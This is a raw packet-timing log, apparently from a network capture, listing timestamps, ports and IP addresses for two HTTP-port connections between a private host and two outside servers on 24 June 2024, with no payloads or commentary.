Jun 24, 2024 00:10:22.068785906 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.068798065 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.068850040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.068963051 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.068974018 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.068984032 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.068994999 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.069005013 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.069015026 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.069016933 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.069034100 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.069057941 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.088686943 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088779926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088792086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088804007 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088818073 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088829041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088840008 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088850021 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088854074 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.088881969 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.088926077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088936090 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.088948011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088959932 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088972092 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.088975906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.088984013 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089013100 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.089039087 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.089155912 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089168072 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089179993 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089209080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.089221954 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.089242935 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089255095 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089265108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089277029 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089287043 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089291096 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.089299917 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.089312077 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.089351892 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095331907 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095361948 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095374107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095400095 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095426083 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095432997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095446110 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095458031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095477104 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095483065 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095489979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095504045 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095542908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095702887 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095752001 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095757961 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095766068 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095793009 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095797062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095822096 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095839977 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.095900059 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095911980 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095917940 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095922947 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.095968962 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096008062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096019983 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096048117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096056938 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096062899 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096074104 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096086025 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096092939 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096102953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096128941 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096159935 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096170902 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096182108 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096194029 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096204042 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096218109 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096237898 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096288919 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096302032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096313953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096326113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096333027 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096365929 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096386909 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096400023 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096410990 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096431017 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096466064 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096688986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096736908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096748114 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096760035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096792936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096807957 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096829891 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096843004 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096853971 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096865892 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096875906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096878052 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.096904993 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.096935987 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097002029 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097013950 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097027063 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097038031 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097047091 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097063065 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097095966 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097132921 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097146034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097157955 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097170115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097177982 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097212076 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097246885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097259045 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097270012 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097281933 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097291946 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097295046 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097326994 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097357988 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097400904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097414017 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097424984 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097434044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097444057 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097445011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097460032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097464085 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097472906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097485065 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097498894 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097522020 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097611904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097624063 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097636938 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097659111 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097688913 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097742081 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097754002 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097765923 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097776890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097784996 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097790003 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097801924 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097815037 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.097822905 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.097861052 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.108702898 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108724117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108736038 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108797073 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.108838081 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.108863115 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108882904 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108895063 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108916998 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.108948946 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.108964920 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108977079 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.108989000 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.109016895 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.109046936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.109088898 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.109101057 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.109112024 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.109123945 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.109139919 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.109174013 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.109180927 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.109239101 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.110416889 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110429049 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110450983 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110471010 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110482931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110493898 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.110496044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110510111 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110518932 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.110573053 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.110579967 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.110634089 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.111516953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111545086 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111555099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111576080 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.111618042 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.111620903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111634970 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111680031 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.111699104 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111711979 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111722946 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:22.111747980 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.111778021 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:22.135957003 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.135979891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.135989904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136024952 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136059999 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136065960 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136071920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136090040 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136147022 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136172056 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136183977 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136194944 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136207104 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136220932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136224985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136241913 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136287928 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136339903 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136358976 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136370897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136383057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136390924 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136394978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136435032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136473894 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136501074 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136518955 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136531115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136543036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136550903 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136554956 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136565924 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136576891 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136610985 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136703014 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136715889 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136727095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136739016 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136754036 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136756897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136768103 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136779070 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136821032 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.136838913 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136851072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.136893034 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.137279034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137303114 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137321949 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137326956 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.137334108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137346029 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137358904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137377977 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.137414932 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.137460947 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137474060 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137490034 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.137502909 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.137541056 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138509989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138529062 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138545990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138556957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138557911 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138566017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138607025 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138624907 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138638020 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138655901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138665915 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138679981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138715982 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138720036 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138741970 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138752937 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138765097 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138796091 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138837099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138849974 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138860941 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138884068 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138910055 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.138958931 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138972044 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138983011 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.138994932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139003992 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139005899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139045954 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139117956 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139130116 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139141083 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139151096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139161110 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139188051 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139563084 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139602900 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139607906 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139615059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139647007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139652014 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139662981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139674902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139686108 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139695883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139719963 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139750957 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139792919 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139838934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139851093 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139862061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139873981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139893055 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139935970 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.139939070 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139950037 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139961958 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139972925 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139983892 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:22.139987946 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140001059 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140041113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:22.140168905 CEST	80	49725	77.91.77.81	192.168.2.5
